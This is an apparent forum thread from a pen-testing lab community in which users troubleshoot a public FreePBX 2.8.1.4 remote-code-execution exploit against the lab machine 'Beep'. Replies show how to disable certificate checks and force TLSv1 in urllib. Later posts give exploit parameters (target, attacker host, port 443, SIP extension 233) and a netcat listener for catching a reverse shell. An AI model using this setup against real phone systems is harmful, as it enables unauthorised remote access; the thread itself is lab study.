I would like to start with a thanks to whom may solve this one for me.
So as my pen-testing studies goes from a machine to another i encountered Something that i found as very interesting ,
I was looking for another way to exploit FreePBX 2.8.1.4 (which is the version the Machine is currently running , and some how related to Elastix 2.2.0 Which i don`t completely understand how these two are combine to work
(Is FreePBX the OS? and Elastix is the web application?)
So i found this exploit that actually has a video proof of working
ippsec did the same with another exploit that matches the versions involved in here, and from reading the exploit itself , it seems legit.
So why when i try to apply this exploit to this machine (Beep) it fails?
Didnât watch the video, but the error message in your screenshot states that urllib didnât like the (potentially self-signed) TLS certificate. You might need to tell urllib to simply ignore the certificate: python ignore certificate validation urllib2 - Stack Overflow
@HomeSen said:
Didnât watch the video, but the error message in your screenshot states that urllib didnât like the (potentially self-signed) TLS certificate. You might need to tell urllib to simply ignore the certificate: python ignore certificate validation urllib2 - Stack Overflow
Dear HomeSen , thank you for your time ,
I don`t understand how can i tell python to ignore the TLS cert
Here is the full exploit code (i added .requests to the original code since it gave me an error without this)
i would really appreciate it if you could show me what you meant
All you need to do is add import ssl at the beginning of the script and extending the urlopen() call with an additional parameter: urllib.request.urlopen(url, context=ssl._create_unverified_context())
Strange. -Out of curiosity: Is the service even running on HTTPS?-
Sounds like the server is using an old SSL-/TLS-protocol version. Can you run sslscan against the server and post the output, please?
Well, it runs on HTTPS. The ânot secureâ is usually due to self-signed certificates.
The server seems to only allow old/insecure protocols, so you need to explicitly tell urllib to also use one of those old protocols: ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE urllib.request.urlopen(url, context=ctx)
That way, urllib should use TLSv1.0 and also ignore the self-signed certificate.
Regarding Discord, you can reach me under: HomeSen#8275
But I canât promise to be more responsive than here, due to work and kids
I am so thankful for all of your help!
The code finally got executed with no errors!
Unfortunately after nc -lvp 443 there was not any connection established
I am more happy that the code actually ran than the exploit itself didn`t work ( lol )
I will see you at the Discord
You are awesome!
Thank you!
This exploit works with the updated code supplied by HomeSen. The issue is the extension.
After looking into the extensions with sipvicious_svwar and not really getting anything concrete, I decided to loop through some extensions to see if I could get a connection. I got a shell while connecting to extension 233.
Using the code in here you would just change the extension to 233.
rhost = â10.10.10.7â
lhost = â10.10.14.13â
lport = 443
extension = â233â
url = âhttps payloadâ
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
urllib.request.urlopen(url, context=ctx)
If the extension is not connecting, here is the code I used to find a connectable extension. I just looped through a bunch of extensions, looking for a connection.
](https://imgur.com/YMO7uS3.png){kind=link}